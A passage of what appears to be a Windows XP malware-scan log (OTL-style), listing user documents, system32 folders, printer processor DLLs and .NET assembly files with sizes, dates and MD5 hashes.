[2011/06/21 13:56:05 | 000,691,581 | ---- | M] () -- C:\Documents and Settings\Annie\My Documents\Differentiation and Apoptosis in Human Immortalized Sebocytes.PDF
[2011/05/29 00:04:49 | 000,745,964 | ---- | M] () -- C:\Documents and Settings\Annie\My Documents\eduroam.PDF
[2011/11/30 14:10:03 | 001,720,716 | ---- | M] () -- C:\Documents and Settings\Annie\My Documents\included.xlsx
[2011/06/21 13:53:28 | 000,091,498 | ---- | M] () -- C:\Documents and Settings\Annie\My Documents\Isotretinoin Revisited- Pluripotent Effects on Human Sebaceous Gland Cells.PDF
[2011/06/21 13:54:01 | 002,407,108 | ---- | M] () -- C:\Documents and Settings\Annie\My Documents\Isotretinoin Temporally Regulates Distinct Sets of Genes in Patient Skin.PDF
[2011/07/20 23:51:41 | 000,005,632 | -HS- | M] () -- C:\Documents and Settings\Annie\My Documents\Thumbs.db
[2011/06/21 13:55:04 | 002,216,511 | ---- | M] () -- C:\Documents and Settings\Annie\My Documents\Towards Dissecting the Pathogenesis of Retinoid-Induced Hair Loss All-Trans Retinoic Acid Induces Premature Hair Follicle Regression (Catagen) by Upregulation of Transforming Growth Factor-β2 in the Dermal Papilla

< %CommonProgramFiles%\*.* >

< %PROGRAMFILES%\*.* >

< %systemroot%\system32\config\systemprofile\*.* >
[2011/05/03 23:50:50 | 000,262,144 | ---- | M] () -- C:\WINDOWS\system32\config\systemprofile\ntuser.dat
[2012/05/12 13:33:00 | 000,001,024 | -H-- | M] () -- C:\WINDOWS\system32\config\systemprofile\NTUSER.DAT.LOG

< %windir%\ServiceProfiles\LocalService\AppData\Local\Temp\*.* >

< %windir%\ServiceProfiles\NetworkService\AppData\Local\Temp\*.* >

< %windir%\temp*.* >

< %windir%\system32\*. >
[2009/08/03 09:17:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\1025
[2009/08/03 09:17:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\1028
[2009/08/03 09:17:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\1031
[2009/08/03 09:18:02 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\1033
[2009/08/03 09:17:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\1037
[2009/08/03 09:17:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\1041
[2009/08/03 09:17:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\1042
[2009/08/03 09:17:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\1054
[2009/08/03 09:17:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\2052
[2009/08/03 09:17:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\3076
[2009/08/03 09:17:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\3com_dmi
[2011/10/18 06:44:29 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\Adobe
[2009/08/03 15:18:55 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\Atheros_L1e
[2011/07/09 10:08:25 | 000,000,000 | -H-D | M] -- C:\WINDOWS\system32\CanonIJ Uninstaller Information
[2012/05/12 20:12:36 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\CatRoot
[2012/05/13 11:14:14 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\CatRoot2
[2009/08/03 13:27:10 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\Com
[2012/05/12 13:38:54 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\config
[2009/08/03 09:17:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\dhcp
[2009/08/03 15:36:51 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\DirectX
[2012/05/13 11:18:05 | 000,000,000 | RHSD | M] -- C:\WINDOWS\system32\dllcache
[2012/05/13 11:48:02 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\drivers
[2012/01/25 17:21:53 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\DRVSTORE
[2009/08/03 09:23:23 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\en
[2011/06/13 16:12:18 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\en-US
[2009/08/03 15:10:22 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\ENU
[2009/08/03 09:17:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\export
[2012/03/17 14:29:00 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\FxsTmp
[2009/08/03 13:28:25 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\ias
[2009/08/03 09:18:19 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\icsxml
[2009/08/03 09:17:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\IME
[2009/08/03 09:17:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\inetsrv
[2009/08/03 15:10:21 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\Lang
[2011/09/08 16:04:08 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\LogFiles
[2011/10/18 06:44:54 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\Macromed
[2009/08/03 13:31:41 | 000,000,000 | --SD | M] -- C:\WINDOWS\system32\Microsoft
[2009/08/03 13:27:03 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\MsDtc
[2009/08/03 13:32:33 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\mui
[2009/08/03 09:21:47 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\npp
[2009/08/03 15:37:45 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\OEM
[2009/08/03 15:18:02 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\oobe
[2009/08/03 09:18:50 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\ras
[2011/05/04 00:00:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\ReinstallBackups
[2011/07/24 22:29:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\Restore
[2009/08/03 15:18:29 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\RTCOM
[2009/08/03 09:23:23 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\scripting
[2009/08/03 09:22:08 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\Setup
[2009/08/03 09:17:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\ShellExt
[2011/06/13 16:11:48 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\spool
[2009/08/03 13:32:54 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\URTTemp
[2009/08/03 09:23:23 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\usmt
[2012/05/12 13:38:37 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\wbem
[2009/08/03 09:17:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\wins
[2009/08/03 13:29:01 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\xircom
[2011/06/13 16:12:22 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\XPSViewer

< %systemroot%\system32\*.dll /lockedfiles >
[1 C:\WINDOWS\system32\*.tmp files -> C:\WINDOWS\system32\*.tmp -> ]

< %systemroot%\Tasks\*.job /lockedfiles >

< %systemroot%\system32\drivers\*.sys /90 >

< %systemroot%\system32\drivers\*.sys /lockedfiles >

< %systemroot%\system32\Spool\prtprocs\w32x86\*.dll >
[2010/08/25 05:00:00 | 000,027,648 | ---- | M] (CANON INC.) -- C:\WINDOWS\system32\Spool\prtprocs\w32x86\CNMPDAA.DLL
[2010/08/25 05:00:00 | 000,073,216 | ---- | M] (CANON INC.) -- C:\WINDOWS\system32\Spool\prtprocs\w32x86\CNMPPAA.DLL
[2008/07/06 08:06:10 | 000,089,088 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\Spool\prtprocs\w32x86\filterpipelineprintproc.dll
[2006/10/26 19:56:12 | 000,033,104 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\Spool\prtprocs\w32x86\msonpppr.dll

< %systemroot%\*. /rp /s >

< %systemroot%\assembly\tmp\*.* /S /MD5 >

< %systemroot%\assembly\temp\*.* /S /MD5 >

< %systemroot%\assembly\GAC_32\*.* /S /MD5 >
[2011/05/18 19:04:06 | 000,064,000 | ---- | M] () MD5=AEE629029E04E11301668DD5D259F5C8 -- C:\WINDOWS\assembly\GAC_32\cli_cppuhelper\1.0.21.0__ce2cb7e279207b9e\cli_cppuhelper.dll
[2011/06/13 16:10:02 | 000,069,120 | ---- | M] () MD5=DC426A365577F27187F99EB506ECD5D1 -- C:\WINDOWS\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll
[2011/06/13 16:10:05 | 000,072,192 | ---- | M] () MD5=29B35A999E341A37BE67771BE01CC275 -- C:\WINDOWS\assembly\GAC_32\ISymWrapper\2.0.0.0__b03f5f7f11d50a3a\ISymWrapper.dll
[2011/06/13 16:12:08 | 000,163,840 | ---- | M] () MD5=36BDD82A92AA704034475C2DEF7FBD29 -- C:\WINDOWS\assembly\GAC_32\Microsoft.Transactions.Bridge.Dtc\3.0.0.0__b03f5f7f11d50a3a\Microsoft.Transactions.Bridge.Dtc.dll
[2011/06/13 16:10:13 | 000,066,728 | ---- | M] () MD5=C01B81BB10AD14DBC5C4ECD350638096 -- C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\big5.nlp
[2011/06/13 16:10:13 | 000,082,172 | ---- | M] () MD5=EE1F60F8774D74BED8B13498F3FE737A -- C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\bopomofo.nlp
[2011/06/13 16:10:13 | 000,116,756 | ---- | M] () MD5=F6DFDA5A31162D848634504565F6D321 -- C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\ksc.nlp
[2011/06/13 16:10:13 | 004,546,560 | ---- | M] () MD5=0E6ABF2107C72F5FA86EE620BE315CA0 -- C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll
[2011/06/13 16:10:13 | 000,059,342 | ---- | M] () MD5=DA5748A89E22A3932387E65694B25BBB -- C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\normidna.nlp
[2011/06/13 16:10:13 | 000,045,794 | ---- | M] () MD5=3831A5E217D6FA828CCE1011DA26E677 -- C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\normnfc.nlp
[2011/06/13 16:10:13 | 000,039,284 | ---- | M] () MD5=DBDE664E0BA4BACD0A6A04AE2232B205 -- C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\normnfd.nlp
[2011/06/13 16:10:13 | 000,066,384 | ---- | M] () MD5=C9B88B759FE81D59CE8EBF5A0A8EB75A -- C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\normnfkc.nlp
[2011/06/13 16:10:13 | 000,060,294 | ---- | M] () MD5=3CAB6AB66759FCDF73B61EE262C9ACF4 -- C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\normnfkd.nlp
[2011/06/13 16:10:13 | 000,083,748 | ---- | M] () MD5=54144F43EDF5AA8F504A30E7C1D1A7B5 -- C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\prc.nlp
[2011/06/13 16:10:13 | 000,083,748 | ---- | M] () MD5=901863C68E6523336CAC602FE9320ABC -- C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\prcp.nlp
[2011/06/13 16:10:13 | 000,262,148 | ---- | M] () MD5=FB59D247F7143C3B9683A547E808A88B -- C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
[2011/06/13 16:10:13 | 000,020,320 | ---- | M] () MD5=FF13BA175F0013D2311827E0D438C60B -- C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
[2011/06/13 16:10:13 | 000,028,288 | ---- | M] () MD5=09E420F90A329BDA68477FA4AF43CB28 -- C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\xjis.nlp
[2011/05/18 19:04:12 | 000,000,382 | ---- | M] () MD5=3BAF2A374186AB711B5A34EE5B2F44EC -- C:\WINDOWS\assembly\GAC_32\policy.1.0.cli_cppuhelper\21.0.0.0__ce2cb7e279207b9e\cli_cppuhelper.config
[2011/05/18 19:04:11 | 000,003,072 | ---- | M] () MD5=1559D82D88D5A0CA92EF9B173EDAB795 -- C:\WINDOWS\assembly\GAC_32\policy.1.0.cli_cppuhelper\21.0.0.0__ce2cb7e279207b9e\policy.1.0.cli_cppuhelper.dll
[2011/06/13 16:12:12 | 004,210,688 | ---- | M] () MD5=A9D42B0504EAE68C4D45692F019B543A -- C:\WINDOWS\assembly\GAC_32\PresentationCore\3.0.0.0__31bf3856ad364e35\PresentationCore.dll
[2011/06/13 16:10:12 | 000,486,400 | ---- | M] () MD5=B2EDA351AB2DEE6F0CE95B38F8BFA0D5 -- C:\WINDOWS\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\System.Data.OracleClient.dll
[2011/06/13 16:10:14 | 002,933,248 | ---- | M] () MD5=16F96C1496CBD0965285AB19A9271D02 -- C:\WINDOWS\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll
[2011/06/13 16:10:11 | 000,258,048 | ---- | M] () MD5=9631B15DB7C43C267636FF43C3075E07 -- C:\WINDOWS\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll
[2011/06/13 16:10:11 | 000,113,664 | ---- | M] () MD5=E786C33D35D39C5CCB523AECC18D7BD7 -- C:\WINDOWS\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll
[2011/06/13 16:12:14 | 000,368,640 | ---- | M] () MD5=34FA631FAA4B2DF8C0A92B7B5AD9D6E1 -- C:\WINDOWS\assembly\GAC_32\System.Printing\3.0.0.0__31bf3856ad364e35\System.Printing.dll
[2011/06/13 16:10:07 | 000,261,632 | ---- | M] () MD5=F054572A92573CA32D5F3AA8C15D2BAC -- C:\WINDOWS\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll
[2011/06/13 16:09:55 | 005,238,784 | ---- | M] () MD5=4D041993C3728B5924039E69074F238C -- C:\WINDOWS\assembly\GAC_32\System.Web\2.0.0.0__b03f5f7f11d50a3a\System.Web.dll

< %systemroot%\assembly\GAC_MSIL\*.* /S /MD5 >
[2011/06/13 16:10:01 | 000,010,752 | ---- | M] () MD5=A5A56B4957BD59D324821522FE14F751 -- C:\WINDOWS\assembly\GAC_MSIL\Accessibility\2.0.0.0__b03f5f7f11d50a3a\Accessibility.dll
[2011/06/13 16:09:56 | 000,507,904 | ---- | M] () MD5=B8FE2350B2236EE3D1CECA34E0C0FF17 -- C:\WINDOWS\assembly\GAC_MSIL\AspNetMMCExt\2.0.0.0__b03f5f7f11d50a3a\AspNetMMCExt.dll
[2011/05/18 19:03:46 | 000,011,264 | ---- | M] () MD5=8AF24227572664D76599F05A2139CA55 -- C:\WINDOWS\assembly\GAC_MSIL\cli_basetypes\1.0.18.0__ce2cb7e279207b9e\cli_basetypes.dll
[2011/05/18 19:04:06 | 000,892,928 | ---- | M] () MD5=75C68BE52B2B941B3E5C83CB8D744A04 -- C:\WINDOWS\assembly\GAC_MSIL\cli_oootypes\1.0.7.0__ce2cb7e279207b9e\cli_oootypes.dll
[2011/05/18 19:03:46 | 000,007,680 | ---- | M] () MD5=C5A6D7B163BCF83CF7433E2F00CFF1D0 -- C:\WINDOWS\assembly\GAC_MSIL\cli_ure\1.0.21.0__ce2cb7e279207b9e\cli_ure.dll
[2011/05/18 19:03:47 | 000,118,784 | ---- | M] () MD5=1A8D7B1BE5FA2C1F83C5C139823F3EAC -- C:\WINDOWS\assembly\GAC_MSIL\cli_uretypes\1.0.7.0__ce2cb7e279207b9e\cli_uretypes.dll
[2011/06/13 16:10:01 | 000,013,312 | ---- | M] () MD5=107F49F1BF0FB27A6CD758EB8C4D95A0 -- C:\WINDOWS\assembly\GAC_MSIL\cscompmgd\8.0.0.0__b03f5f7f11d50a3a\cscompmgd.dll
[2011/06/13 16:10:02 | 000,008,192 | ---- | M] () MD5=6CD7461E06CB8BAEE3B16C3D7F637CD0 -- C:\WINDOWS\assembly\GAC_MSIL\IEExecRemote\2.0.0.0__b03f5f7f11d50a3a\IEExecRemote.dll
[2011/06/13 16:10:02 | 000,077,824 | ---- | M] () MD5=24F0385D06BD86A97412B8905483313E -- C:\WINDOWS\assembly\GAC_MSIL\IEHost\2.0.0.0__b03f5f7f11d50a3a\IEHost.dll
[2011/06/13 16:10:03 | 000,006,656 | ---- | M] () MD5=11F3AC2D47E566615819F5BF0DD18379 -- C:\WINDOWS\assembly\GAC_MSIL\IIEHost\2.0.0.0__b03f5f7f11d50a3a\IIEHost.dll
[2011/06/13 16:13:07 | 000,106,496 | ---- | M] () MD5=29CED3B606BA7E2B49E52931C5CB53B7 -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.Build.Conversion.v3.5\3.5.0.0__b03f5f7f11d50a3a\Microsoft.Build.Conversion.v3.5.dll
[2011/06/13 16:10:09 | 000,348,160 | ---- | M] () MD5=996AAEEC01C734347DE8A72542FD1C12 -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.Build.Engine\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll
[2011/06/13 16:13:08 | 000,733,184 | ---- | M] () MD5=31C6E94759BF4D2FBE3239FFA717967D -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.Build.Engine\3.5.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll
[2011/06/13 16:10:09 | 000,036,864 | ---- | M] () MD5=D2A1C3150E43738BAB3D0AD9921B3E50 -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.Build.Framework\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll
[2011/06/13 16:13:08 | 000,036,864 | ---- | M] () MD5=17C6F3F73858732DE59D6D957958E9AF -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.Build.Framework\3.5.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll
[2011/06/13 16:13:09 | 000,802,816 | ---- | M] () MD5=37F17D4698086C90127BBD90E73D7FE2 -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.Build.Tasks.v3.5\3.5.0.0__b03f5f7f11d50a3a\Microsoft.Build.Tasks.v3.5.dll
[2011/06/13 16:10:10 | 000,655,360 | ---- | M] () MD5=8A3F5B72C3F402C8D33027A4C77F55AC -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.Build.Tasks\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Tasks.dll
[2011/06/13 16:13:09 | 000,094,208 | ---- | M] () MD5=E32A06F647517D0DEA80F29B459E8FA2 -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.Build.Utilities.v3.5\3.5.0.0__b03f5f7f11d50a3a\Microsoft.Build.Utilities.v3.5.dll
[2011/06/13 16:10:11 | 000,077,824 | ---- | M] () MD5=640BF6BB259B53BEFF59135645C63B18 -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.Build.Utilities\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Utilities.dll
[2011/06/13 16:10:05 | 000,749,568 | ---- | M] () MD5=EB535D00C508119EEE4042B737165A3B -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.JScript\8.0.0.0__b03f5f7f11d50a3a\Microsoft.JScript.dll
[2011/06/13 16:12:08 | 000,397,312 | ---- | M] () MD5=66F6B3248D6C39CEFA49174133A694FE -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.Transactions.Bridge\3.0.0.0__b03f5f7f11d50a3a\Microsoft.Transactions.Bridge.dll
[2011/06/13 16:10:04 | 000,110,592 | ---- | M] () MD5=D676BC7C829F86A215676281A1032C6B -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.VisualBasic.Compatibility.Data\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.Compatibility.Data.dll
[2011/06/13 16:10:04 | 000,372,736 | ---- | M] () MD5=226956F70AEBBBF5ACBC9ADA6522B6F6 -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.VisualBasic.Compatibility\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.Compatibility.dll
[2011/06/13 16:10:07 | 000,028,672 | ---- | M] () MD5=3D61BFCBE13C2DC8F5AE20BF02145322 -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.VisualBasic.Vsa\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.Vsa.dll
[2011/06/13 16:10:03 | 000,659,456 | ---- | M] () MD5=EFC806A1C4C6CE9F69AECE0AB72C1E34 -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
[2011/06/13 16:13:08 | 000,041,984 | ---- | M] () MD5=9F065BF574C956B85DB355C32E7E995E -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.VisualC.STLCLR\1.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualC.STLCLR.dll
[2011/06/13 16:10:13 | 000,005,632 | ---- | M] () MD5=7E50D25F9A5BC75F22CA7AEB52176CA2 -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.VisualC\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualC.Dll
[2011/06/13 16:10:07 | 000,012,800 | ---- | M] () MD5=B27AA2EA41728FAF5E9642CFD2958FB9 -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.Vsa.Vb.CodeDOMProcessor\8.0.0.0__b03f5f7f11d50a3a\Microsoft.Vsa.Vb.CodeDOMProcessor.dll
[2011/06/13 16:10:03 | 000,032,768 | ---- | M] () MD5=D251A67B7D6DE2194F6E264055E020FB -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.Vsa\8.0.0.0__b03f5f7f11d50a3a\Microsoft.Vsa.dll
[2011/06/13 16:10:02 | 000,007,168 | ---- | M] () MD5=9659028AFA77387D6D2BF4280C10AB94 -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft_VsaVb\8.0.0.0__b03f5f7f11d50a3a\Microsoft_VsaVb.dll
[2011/05/18 19:03:47 | 000,000,381 | ---- | M] () MD5=E699346ED23AC26088308B4A418C0212 -- C:\WINDOWS\assembly\GAC_MSIL\policy.1.0.cli_basetypes\18.0.0.0__ce2cb7e279207b9e\cli_basetypes.config
[2011/05/18 19:03:47 | 000,003,072 | ---- | M] () MD5=6C9F519C158A99EDC57E91C48E1C3FC7 -- C:\WINDOWS\assembly\GAC_MSIL\policy.1.0.cli_basetypes\18.0.0.0__ce2cb7e279207b9e\policy.1.0.cli_basetypes.dll
[2011/05/18 19:04:12 | 000,000,378 | ---- | M] () MD5=4D258F27BBF2B1FFF450686A20A9E180 -- C:\WINDOWS\assembly\GAC_MSIL\policy.1.0.cli_oootypes\7.0.0.0__ce2cb7e279207b9e\cli_oootypes.config
[2011/05/18 19:04:12 | 000,003,072 | ---- | M] () MD5=361F2A8E020592EAAC3B5575E3814612 -- C:\WINDOWS\assembly\GAC_MSIL\policy.1.0.cli_oootypes\7.0.0.0__ce2cb7e279207b9e\policy.1.0.cli_oootypes.dll
[2011/05/18 19:03:47 | 000,000,375 | ---- | M] () MD5=8971CE6B13533E8408ABE22B93F2F0B8 -- C:\WINDOWS\assembly\GAC_MSIL\policy.1.0.cli_ure\21.0.0.0__ce2cb7e279207b9e\cli_ure.config
[2011/05/18 19:03:47 | 000,003,072 | ---- | M] () MD5=A7497B0D3E122E66991ED7B69E4A813D -- C:\WINDOWS\assembly\GAC_MSIL\policy.1.0.cli_ure\21.0.0.0__ce2cb7e279207b9e\policy.1.0.cli_ure.dll
[2011/05/18 19:03:47 | 000,000,378 | ---- | M] () MD5=3183C062A24CDC2AD395D915114AB118 -- C:\WINDOWS\assembly\GAC_MSIL\policy.1.0.cli_uretypes\7.0.0.0__ce2cb7e279207b9e\cli_uretypes.config
[2011/05/18 19:03:47 | 000,003,072 | ---- | M] () MD5=A77BBE7E422D641B88D031E96158D3E9 -- C:\WINDOWS\assembly\GAC_MSIL\policy.1.0.cli_uretypes\7.0.0.0__ce2cb7e279207b9e\policy.1.0.cli_uretypes.dll
[2011/06/13 16:12:17 | 000,598,016 | ---- | M] () MD5=28595FA306E58AACD7DAFF001F430703 -- C:\WINDOWS\assembly\GAC_MSIL\PresentationBuildTasks\3.0.0.0__31bf3856ad364e35\PresentationBuildTasks.dll
[2011/06/13 16:12:12 | 000,032,768 | ---- | M] () MD5=93F9CC2360815D8EF955407CF92B38AA -- C:\WINDOWS\assembly\GAC_MSIL\PresentationCFFRasterizer\3.0.0.0__31bf3856ad364e35\PresentationCFFRasterizer.dll
[2011/06/13 16:12:18 | 000,046,104 | ---- | M] () MD5=8BA7C024070F2B7FDD98ED8A4BA41789 -- C:\WINDOWS\assembly\GAC_MSIL\PresentationFontCache\3.0.0.0__31bf3856ad364e35\PresentationFontCache.exe
[2011/06/13 16:12:20 | 000,196,608 | ---- | M] () MD5=0C488A21B5A63055CB7736E3E0C75B1F -- C:\WINDOWS\assembly\GAC_MSIL\PresentationFramework.Aero\3.0.0.0__31bf3856ad364e35\PresentationFramework.Aero.dll
[2011/06/13 16:12:20 | 000,139,264 | ---- | M] () MD5=DA8417F8973EC51F0F1859CA0B334FC5 -- C:\WINDOWS\assembly\GAC_MSIL\PresentationFramework.Classic\3.0.0.0__31bf3856ad364e35\PresentationFramework.Classic.dll
[2011/06/13 16:12:20 | 000,397,312 | ---- | M] () MD5=7E61032F4F2BAB036B859D3B22D26DD0 -- C:\WINDOWS\assembly\GAC_MSIL\PresentationFramework.Luna\3.0.0.0__31bf3856ad364e35\PresentationFramework.Luna.dll
[2011/06/13 16:12:20 | 000,163,840 | ---- | M] () MD5=D1E117EDDEFEB220351BE0C7B27A4646 -- C:\WINDOWS\assembly\GAC_MSIL\PresentationFramework.Royale\3.0.0.0__31bf3856ad364e35\PresentationFramework.Royale.dll
[2011/06/13 16:12:21 | 005,283,840 | ---- | M] () MD5=DCC01F2F3B12AB72C5663E22140DA209 -- C:\WINDOWS\assembly\GAC_MSIL\PresentationFramework\3.0.0.0__31bf3856ad364e35\PresentationFramework.dll
[2011/06/13 16:12:22 | 000,864,256 | ---- | M] () MD5=428D3714C85BACE55476C91E0D90E495 -- C:\WINDOWS\assembly\GAC_MSIL\PresentationUI\3.0.0.0__31bf3856ad364e35\PresentationUI.dll
[2011/06/13 16:12:13 | 000,528,384 | ---- | M] () MD5=A37D01E48B3908330E780466312D54A6 -- C:\WINDOWS\assembly\GAC_MSIL\ReachFramework\3.0.0.0__31bf3856ad364e35\ReachFramework.dll
[2011/06/13 16:13:10 | 000,005,632 | ---- | M] () MD5=807B70A78ACE7D01F769FE502A769E67 -- C:\WINDOWS\assembly\GAC_MSIL\Sentinel.v3.5Client\3.5.0.0__b03f5f7f11d50a3a\Sentinel.v3.5Client.dll
[2011/06/13 16:12:08 | 000,110,592 | ---- | M] () MD5=6EC3D3F69A5D91C7879E938EB0AFDF1A -- C:\WINDOWS\assembly\GAC_MSIL\SMDiagnostics\3.0.0.0__b77a5c561934e089\SMdiagnostics.dll
[2011/06/13 16:10:12 | 000,110,592 | ---- | M] () MD5=0AD1C94AB2D36B79B9F2B54EADEB300A -- C:\WINDOWS\assembly\GAC_MSIL\sysglobl\2.0.0.0__b03f5f7f11d50a3a\sysglobl.dll
[2011/06/13 16:13:10 | 000,045,056 | ---- | M] () MD5=B34B75256D536385B927193FB1DCBB81 -- C:\WINDOWS\assembly\GAC_MSIL\System.AddIn.Contract\2.0.0.0__b03f5f7f11d50a3a\System.AddIn.Contract.dll
[2011/06/13 16:13:11 | 000,163,840 | ---- | M] () MD5=212E7E4F44432B5EDA508D454FC01A61 -- C:\WINDOWS\assembly\GAC_MSIL\System.AddIn\3.5.0.0__b77a5c561934e089\System.AddIn.dll
[2011/06/13 16:13:17 | 000,057,344 | ---- | M] () MD5=34AAEA0DCF908A7D3C1D8C2132B0E4D4 -- C:\WINDOWS\assembly\GAC_MSIL\System.ComponentModel.DataAnnotations\3.5.0.0__31bf3856ad364e35\System.ComponentModel.DataAnnotations.dll
[2011/06/13 16:10:12 | 000,081,920 | ---- | M] () MD5=41BC941761FB3D1E21826C3C0E3CEEEE -- C:\WINDOWS\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll
[2011/06/13 16:10:14 | 000,425,984 | ---- | M] () MD5=C1C4025B5F5311AC8BCC318B0C244D58 -- C:\WINDOWS\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.configuration.dll
[2011/06/13 16:13:12 | 000,667,648 | ---- | M] () MD5=6617F24759BB1F3873C88AD9E0DF0435 -- C:\WINDOWS\assembly\GAC_MSIL\System.Core\3.5.0.0__b77a5c561934e089\System.Core.dll
[2011/06/13 16:13:12 | 000,053,248 | ---- | M] () MD5=1FDC244EEDD9B7804C7829DA11F1522E -- C:\WINDOWS\assembly\GAC_MSIL\System.Data.DataSetExtensions\3.5.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll
